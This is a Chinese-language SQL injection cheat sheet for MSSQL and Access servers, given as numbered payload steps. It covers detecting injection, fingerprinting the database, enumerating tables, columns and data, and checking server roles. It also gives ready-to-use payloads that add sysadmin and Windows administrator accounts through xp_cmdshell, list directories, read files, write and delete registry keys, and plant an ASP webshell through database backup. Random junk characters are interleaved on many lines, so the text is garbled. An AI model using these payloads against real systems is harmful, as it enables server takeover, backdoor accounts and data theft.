1.判断是否有注入;and 1=1 ;and 1=2
N-lGa@ j
2.初步判断是否是mssql ;and user>0 6{x,*[v
)PkNWj6%y
3.注入参数是字符'and [查询条件] and ''=' Xf=XBoN|
g]*
4.搜索时没过滤参数的'and [查询条件] and '%25'=' /Y[~-Y+!,
PIA)d-Z
5.判断数据库系统 4vK8kkW1
s/"&9F3
;and (select count(*) from sysobjects)>0 mssql Zn:R
PMk*
y`e4;*1
;and (select count(*) from msysobjects)>0 access Xqp|VbDca
JXiZB
8}
{P8[X@Lu
n<Svwa}
6.猜数据库 ;and (select Count(*) from [数据库名])>0 wI M{pK
{vaaFs
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 B}OY/J/*8
Gx?+9CV
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 DPe]daF
+c:3o*
9.(1)猜字段的ascii值(access) 4A{|[}!
d
{lP
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ?:^mBb)T
"%WgT2)m.
(2)猜字段的ascii值(mssql) 0)YbI!
Nd:R"
p*8
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 J MX6yV
|1Dc!V'?"
10.测试权限结构(mssql) +i `*lBup$
L~{_!Q
jD){I
[\)oo
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- y<W8Q<9
#gQF'
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- +]>+a<x*%
39e;
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 7RU}FE
~:;3uLs,8
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- *, Ld/O;s
iMF<5fLH&
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 'f8(#n=6qP
ocwG7J\W
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- >Sk[vI0Y
#)+- lPe
;and 1=(select IS_MEMBER('db_owner'));-- I^*'.z!4Q
1`f_P$&Z_J
Ocg"M Gb
!yjo
11.添加mssql和系统的帐户 B UUf;Vv
0m[dP
;exec master.dbo.sp_addlogin username;-- RKd
;exec master.dbo.sp_password null,username,password;-- CozKyt/r7
W!$zXwY}(
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- D| I Ec?
:(3|HTz
;exec master.dbo.xp_cmdshell 'net user username password lw8"'0
(J$\-a7<f
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- b yg0.+e0
kg5ev8
;exec master.dbo.xp_cmdshell 'net user username password /add';-- RR1A65B
Q>}2cDl
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- v=YK8fNi
r'/;O
OL59e%X
;'T{li2
12.(1)遍历目录 I"L;L?\S
hVoNw6fE
;create table dirs(paths varchar(100), id int)
R)Q4
9V1cdb~?"T
;insert dirs exec master.dbo.xp_dirtree 'c:\' P=AS>N^yaL
O[~x_xeW
;and (select top 1 paths from dirs)>0 S{F-ttS"
2)iD4G`
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) uE_c4Hp
xc
1A$EY
jX=lAs~6
@
$cUNvI
(2)遍历目录 T~4mQuYi
yT /EHmJ
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 3EFD%9n
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ux2013C_
Zp`T
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 dLh6:Gh8_I
1V&PtI3!!
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 U0B2WmT~Q
GrJ#.
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 UP1?5Q=H]Q
I\P Bu$Ww
tgFJZA
$Ptk|qFe
13.mssql中的存储过程 W+>wu%[L
A//?6OJx?
xp_regenumvalues 注册表根键, 子键 l?N`{,1^
bPD)D'Hs
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 9
wa,k
( `' 8Ww
xp_regread 根键,子键,键值名 I d8wS!W`7
Os),;W0w4
;exec xp_regread V}8$p8#<@
Bl.u=I:Y4
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 To"dG&h
<zfe}0
xp_regwrite 根键,子键, 值名, 值类型, 值 R zR?&J
{5:Zl<0
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 H>7dND2;
kN9yO5h7
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 @Z(rgF{{
=iz,S:[
xp_regdeletevalue 根键,子键,值名 $`Nd?\$
/F[+13C
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 `_AM` >_
0LVE@qEL
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 #Fd W/y5
oN2=DYC41
,\ldz(D?+
w8M2N]&:
14.mssql的backup创建webshell SBKeb|H8
y>o>WN<q
use model "ORzWnE4U
V2znU
create table cmd(str image); Rq)BssdF
\3Jq_9Xv
insert into cmd(str) values (''); a%,fXp>
T{MC-j _T9
backup database model to disk='c:\l.asp'; 4I~i)EKy6
'w<BJTQIL
z_SagU,\
<+E%E4
15.mssql内置函数 $3
8gs{+
4 rB8Nm1
;and (select @@version)>0 获得Windows的版本号 ]
pPz@@xx
Agy
<j
;and user_name()='dbo' 判断当前系统的连接用户是不是sa +cg
{[f,J;
~t/JCxa
;and (select user_name())>0 爆当前系统的连接用户 Hhv$4;&X
hY;_/!_
;and (select db_name())>0 得到当前连接的数据库 8[5|_Eh+
$C_M&O}
ai ftlY
o" _=K%9
16.简洁的webshell qc8Ta"
7[o {9Yp&
use model SE `l(-tL
(O5)wej
create table cmd(str image); E20&hc5 8
Wc'Ehyi;
insert into cmd(str) values (''); vZjZb(jlN
: }?{@#Z
backup database model to disk='g:\wwwtest\l.asp';